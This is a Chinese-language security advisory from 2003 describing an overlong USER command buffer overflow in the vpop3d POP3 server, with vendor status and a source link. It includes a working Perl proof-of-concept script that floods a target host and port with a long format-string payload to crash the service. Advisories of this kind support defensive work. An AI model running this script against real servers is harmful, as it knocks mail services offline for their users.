安全研究
安全漏洞
WVpop3d超长USER命令远程拒绝服务攻击漏洞
发布日期:2003-08-22
更新日期:2003-08-28
受影响系统:vpop3d vpop3d
描述:
BUGTRAQ ID:
8473
Vpop3d是一款支持POP3协议的程序。
Vpop3d没有正确处理USER命令参数,远程攻击者可以利用这个漏洞对POP3服务进行拒绝服务攻击。
服务程序由于没有充分处理带有超长字符串的USER用户名,攻击者提交提交恶意请求导致发生缓冲区溢出,使服务程序崩溃,精心构建提交数据可能以vpop3d进程权限在系统上执行任意指令。
<*来源:Daniel (
deadbeat@sdf.lonestar.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106157300501641&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Daniel (
deadbeat@sdf.lonestar.org)提供了如下测试方法:
#!/usr/bin/perl
#vpop3d Denial Of Service..
#Proof of Concept script..
#Deadbeat, uk2sec..
#e: deadbeat sdf lonestar org
#e: daniels legend co uk
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
if(!$ARGV[1]){
die "usage: perl $0 <host> <port>\n";
}
$dos = "%s%s"x5000;
$req = "USER $dos";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>$port,
PeerAddr=>$host
)or die "can't connect to $host : $port\n";
sleep 2;
print $sox $dos;
sleep 1;
print "done..vpop3d should lock now :)\n";
建议:
厂商补丁:
vpop3d
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://chaogic.com/vhost/浏览次数:2986
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |